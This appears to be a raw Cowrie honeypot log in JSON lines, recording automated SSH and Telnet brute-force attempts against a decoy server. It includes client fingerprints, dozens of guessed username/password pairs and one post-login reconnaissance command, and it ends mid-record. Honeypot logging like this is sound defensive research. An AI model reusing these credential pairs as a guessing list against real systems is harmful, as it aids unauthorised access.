{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:36.836212Z","src_ip":"212.227.235.229","session":"fdfe278748fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:37.247229Z","src_ip":"212.227.125.160","session":"988a54908c78"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:37.439388Z","src_ip":"212.227.235.229","session":"fdfe278748fe"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:38.586890Z","src_ip":"212.227.235.229","session":"fdfe278748fe"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:39.457870Z","src_ip":"212.227.125.160","session":"efff9e2ebed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37216,"dst_ip":"1.2.3.4","dst_port":22,"session":"c73f36c6f126","protocol":"ssh","message":"New connection: 212.227.125.160:37216 (1.2.3.4:22) [session: c73f36c6f126]","sensor":"my-vps","timestamp":"2025-08-28T06:03:43.617048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:43.617952Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:43.723019Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:03:44.044943Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:03:44.274731Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:03:44.275427Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:44.381866Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:44.383116Z","src_ip":"212.227.125.160","session":"c73f36c6f126"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57396,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1dff9877a18","protocol":"ssh","message":"New connection: 212.227.235.229:57396 (1.2.3.4:22) [session: a1dff9877a18]","sensor":"my-vps","timestamp":"2025-08-28T06:03:50.919919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:50.920751Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:51.065037Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:03:51.499709Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:03:51.876625Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:03:51.877376Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:52.023467Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:52.024746Z","src_ip":"212.227.235.229","session":"a1dff9877a18"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":60106,"dst_ip":"1.2.3.4","dst_port":23,"session":"d407c460aae5","protocol":"telnet","message":"New connection: 8.222.212.69:60106 (1.2.3.4:23) [session: d407c460aae5]","sensor":"my-vps","timestamp":"2025-08-28T06:03:53.531624Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46350,"dst_ip":"1.2.3.4","dst_port":22,"session":"453c7c72a236","protocol":"ssh","message":"New connection: 212.227.125.160:46350 (1.2.3.4:22) [session: 453c7c72a236]","sensor":"my-vps","timestamp":"2025-08-28T06:03:58.409678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:58.417684Z","src_ip":"212.227.125.160","session":"453c7c72a236"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:58.514993Z","src_ip":"212.227.125.160","session":"453c7c72a236"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:58.928622Z","src_ip":"212.227.125.160","session":"453c7c72a236"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:00.035952Z","src_ip":"212.227.125.160","session":"453c7c72a236"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":59500,"dst_ip":"1.2.3.4","dst_port":22,"session":"541d39ea5af9","protocol":"ssh","message":"New connection: 80.94.95.112:59500 (1.2.3.4:22) [session: 541d39ea5af9]","sensor":"my-vps","timestamp":"2025-08-28T06:04:01.771668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:04:01.772349Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:04:01.802895Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biggirl","message":"login attempt [admin/biggirl] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:02.010868Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyond","message":"login attempt [admin/beyond] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:03.043623Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.session.closed","duration":30.599562883377075,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:04.051844Z","src_ip":"121.154.148.110","session":"0f5124b179f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyonce","message":"login attempt [admin/beyonce] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:04.076070Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beepbeep","message":"login attempt [admin/beepbeep] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:05.108621Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42122,"dst_ip":"1.2.3.4","dst_port":22,"session":"267f238ca29a","protocol":"ssh","message":"New connection: 212.227.235.229:42122 (1.2.3.4:22) [session: 267f238ca29a]","sensor":"my-vps","timestamp":"2025-08-28T06:04:05.699219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:04:05.700225Z","src_ip":"212.227.235.229","session":"267f238ca29a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:04:05.845706Z","src_ip":"212.227.235.229","session":"267f238ca29a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"becky1","message":"login attempt [admin/becky1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:06.140648Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:06.283220Z","src_ip":"212.227.235.229","session":"267f238ca29a"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:07.172830Z","src_ip":"80.94.95.112","session":"541d39ea5af9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:07.430616Z","src_ip":"212.227.235.229","session":"267f238ca29a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51156,"dst_ip":"1.2.3.4","dst_port":22,"session":"90c2af10878d","protocol":"ssh","message":"New connection: 212.227.125.160:51156 (1.2.3.4:22) [session: 90c2af10878d]","sensor":"my-vps","timestamp":"2025-08-28T06:04:13.167476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:04:13.186972Z","src_ip":"212.227.125.160","session":"90c2af10878d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:04:13.272539Z","src_ip":"212.227.125.160","session":"90c2af10878d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:13.689558Z","src_ip":"212.227.125.160","session":"90c2af10878d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:14.795254Z","src_ip":"212.227.125.160","session":"90c2af10878d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17363,"dst_ip":"1.2.3.4","dst_port":22,"session":"39279d917254","protocol":"ssh","message":"New connection: 212.227.235.229:17363 (1.2.3.4:22) [session: 39279d917254]","sensor":"my-vps","timestamp":"2025-08-28T06:04:21.428121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:04:21.429040Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:04:21.557590Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.login.failed","username":"luis","password":"luis","message":"login attempt [luis/luis] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:22.152804Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35671,"dst_ip":"1.2.3.4","dst_port":23,"session":"330383a8cf7d","protocol":"telnet","message":"New connection: 212.227.235.229:35671 (1.2.3.4:23) [session: 330383a8cf7d]","sensor":"my-vps","timestamp":"2025-08-28T06:04:22.327979Z"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc123","message":"login attempt [luis/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:23.282980Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd123","message":"login attempt [luis/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:24.415605Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.session.closed","duration":31.106504201889038,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:24.638029Z","src_ip":"8.222.212.69","session":"d407c460aae5"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd1234","message":"login attempt [luis/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:25.545742Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc1234","message":"login attempt [luis/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:26.675091Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:27.805431Z","src_ip":"212.227.235.229","session":"39279d917254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57108,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9a2816e126d","protocol":"ssh","message":"New connection: 212.227.125.160:57108 (1.2.3.4:22) [session: d9a2816e126d]","sensor":"my-vps","timestamp":"2025-08-28T06:04:28.009063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:04:28.012283Z","src_ip":"212.227.125.160","session":"d9a2816e126d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.co